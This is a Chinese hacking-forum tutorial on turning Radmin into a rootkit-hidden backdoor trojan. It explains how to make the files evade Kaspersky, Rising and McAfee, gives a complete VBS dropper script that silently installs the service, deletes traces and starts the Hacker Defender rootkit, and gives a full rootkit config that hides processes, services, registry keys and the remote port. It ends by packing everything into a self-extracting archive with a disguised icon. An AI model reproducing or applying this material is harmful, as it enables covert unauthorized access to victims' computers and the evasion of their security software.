rootkit型radmin制作与免杀!
大家好!
我是花痴..好久没做教程了。今天我做一个免杀radmin的安装教程。
总体思路
1.注册表文件如果被杀分二到三个reg导入(分多个reg导入)
2.相关exe和dll的加壳加花达到免杀!修改bat.用vbs静态安装!
3.然后配合黑客守卫者制做自解压缩包 ,压缩生成自定义图标的radmin服务端!
现在网上很多有关于radmin教程。有基础的~有SC替换服务的.也有rootkit型radmin木马.
当然你如果觉得自己免杀功力可以.那也不妨做下.网上教程有的是
http://www.hack58.com/Soft/html/13/25/2006/200608137643.htm
免杀了radmin的服务端和注册表文件和守卫者的hxdef100.exe,但是按照上面兄弟的做法.你生成的
捆绑程序Demo.exe是UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]加壳.我用专用
脱壳后.文件显示不正常.用OD脱了.但是是捆绑文件.免杀比较麻烦..(个人观点).菜鸟要免杀
r_server.exe还要对注册表文件进行免杀.做好上面的步骤.捆绑文件免杀..比较麻烦.
今天我做这个教程是在上面兄弟的基础上.把radmin打造更完美点!
首先下载免安装版的radmin
http://www.onlinedown.net/soft/32049.htm(华军软件园)
下载下来的有文件是被杀的..ASProtect 1.22 - 1.23 Beta 21 -> Alexey Solodovnikov 我脱壳了..我会
把安装包放在我的网盘上的 http://free5.ys168.com/?weeek
我们现在把无壳的进行免杀..小技巧,别用upx加壳.那样容易过不了麦咖啡!然后安装radmin服务..
进注册表导出两个reg文件... ramin.reg和r_server.reg再进行一步步免杀
卡巴杀radmin注册文件..这个我们可以把radmin.reg分开.再做radmin自解压包时.可以分别导入.如果两
个不行.就三个..就一定能过卡巴..我们分别命名为radmin.reg和radmin1.reg.现在radmin的注册表文件
已经免杀了 r_server.exe也已经过卡巴和瑞星了; .我们来制作自解压包.
然后用vbs导入,进行静态安装.如果不用脚本导入.CMD有回显...
脚本如下.复制后保存radmin.vbs
sub cmd()
Set WshShell=ws cript.CreateObject("Ws cript.Shell")
wshshell.run "%ComSpec% /c r_server /uninstall /silence",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c regedit /s RAdmin.reg",0
ws cript.sleep 1000
wshshell.run "%ComSpec% /c regedit /s r_server.reg",0
ws cript.sleep 1000
wshshell.run "%ComSpec% /c r_server /install /silence",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c del /f /q r_server.reg",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c del /f /q RAdmin.reg",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c net start r_server",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c hxdef100.exe -:installonly",0
ws cript.sleep 10000
wshshell.run "%ComSpec% /c net start HackerDefender100",0
ws cript.sleep 10000
set wshshell=nothing
end sub
call cmd()
说明下。我是借鉴nafish兄弟现成的vbs脚本,另外黑客守为者的配置ini文件网上有专门的配置器,也有教程!
你如果不太懂,可以复制我的ini文件,主要要其中的TCPI:60011 [Hidden Ports]这项里把端口修改你radmin连接端口就行了
ini安装文件代码如下:
[Hidden Table]
hxdef*
rcmd.exe
AdmDll.dll
r_server.exe
raddrv.dll
RAdmin.vbe
radmin*
[Hidden Processes]
hxdef*
rcmd.exe
r_server.exe
[Root Processes]
hxdef*
rcmd.exe
r_server.exe
[Hidden Services]
HackerDefender*
r_server*
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
r_server
LEGACY_r_server
[Hidden Regvalues]
NTAuthEnabled
Parameter
Port
Timeout
EnableLogFile
LogFilePath
FilterIp
DisableTrayIcon
AutoAllow
AskUser
EnableEventLog
RAdmin
[Startup Run]
[Free Space]
[Hidden Ports]
TCPI:60011
TCP60011
UDP:
[Settings]
Password=01020304
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDes cription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
现在我们进行自解压包制作!
路径:%systemroot%/system32/radmin
全部覆盖!
然后自定义图标!
完美的radmin出来了.而且是关联内核级后门的!
设为首页
加入收藏
发布作品
栏目导航
rootkit型radmin制作与免杀!
